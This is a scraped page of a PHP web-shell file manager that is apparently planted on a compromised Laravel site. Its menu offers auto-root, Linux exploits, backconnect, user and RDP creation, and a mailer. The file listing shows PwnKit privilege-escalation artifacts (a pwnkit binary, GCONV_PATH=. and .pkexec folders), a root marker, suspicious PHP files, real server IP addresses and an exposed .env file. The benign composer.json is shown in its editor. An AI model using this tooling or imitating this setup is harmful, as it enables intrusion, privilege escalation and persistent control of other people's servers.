Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo8.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Modules
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dnbsofy
[ DIR ]
drwxr-xr-x
fdmjgsr
[ DIR ]
drwxr-xr-x
hqutlrj
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pdiambk
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
pufzmje
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
zkrsnjo
[ DIR ]
drwxr-xr-x
zowglah
[ DIR ]
drwxr-xr-x
ztarmoi
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
.env
974
B
-rw-r--r--
.env.example
984
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
273
B
-rw-r--r--
.htaccess
181
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
222.php
15.76
KB
-rw-r--r--
artisan
1.65
KB
-rwxr-xr-x
codecanyon-YlAVlOiv-appointo-b...
90.75
MB
-rw-r--r--
composer.json
2.96
KB
-rw-r--r--
composer.lock
406.41
KB
-rw-r--r--
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
goat1.php
143.87
KB
-rw-r--r--
modules_statuses.json
23
B
-rw-r--r--
package-lock.json
185.91
KB
-rw-r--r--
package.json
2.11
KB
-rw-r--r--
phpunit.xml
966
B
-rw-r--r--
postcss.config.js
93
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
random.php
52.18
KB
-rw-r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
1.89
KB
-rw-r--r--
vite.config.js
367
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "description": "The Laravel Framework.", "keywords": [ "framework", "laravel", "appointo", "froiden" ], "license": "MIT", "type": "project", "require": { "php": "^8.3", "barryvdh/laravel-dompdf": "^3.1", "barryvdh/laravel-translation-manager": "^0.6.8", "craftsys/msg91-php": "^0.15.3", "froiden/envato": "^5.2.1", "froiden/laravel-installer": "^11.0", "google/apiclient": "^2.10", "guzzlehttp/guzzle": "^7.0", "intervention/image": "^2.5", "laravel/framework": "^13.0", "laravel/socialite": "^5.23", "laravel/tinker": "^3.0", "laravel/ui": "^4.6", "laravel/vonage-notification-channel": "^3.0", "macellan/laravel-zip": "^1.0", "paypal/paypal-server-sdk": "^2.2", "razorpay/razorpay": "2.*", "santigarcor/laratrust": "^8.5.4", "stripe/stripe-php": "^7.66", "symfony/clock": "^7.4", "symfony/console": "^7.4", "symfony/css-selector": "^7.4", "symfony/error-handler": "^7.4", "symfony/event-dispatcher": "^7.4", "symfony/http-foundation": "^7.4", "symfony/http-kernel": "^7.4", "symfony/mailer": "^7.4", "symfony/mime": "^7.4", "symfony/process": "^7.4.5", "symfony/routing": "^7.4", "symfony/string": "^7.4", "symfony/translation": "^7.4", "symfony/uid": "^7.4", "symfony/var-dumper": "^7.4", "nwidart/laravel-modules": "^12.0", "yajra/laravel-datatables-oracle": "^13.0" }, "require-dev": { "barryvdh/laravel-ide-helper": "^3.6", "fakerphp/faker": "^1.23", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^8.0", "phpunit/phpunit": "^12.0" }, "autoload": { "classmap": [ "database/seeds", "database/factories" ], "psr-4": { "App\\": "app/", "Modules\\": "Modules/" }, "files": [ "app/Helper/start.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "extra": { "laravel": { "dont-discover": [] } }, "scripts": { "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate" ], "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover" ] }, "config": { "preferred-install": "dist", "sort-packages": true, "optimize-autoloader": true, "allow-plugins": { "composer/package-versions-deprecated": true, "wikimedia/composer-merge-plugin": true } }, "prefer-stable": true }
Close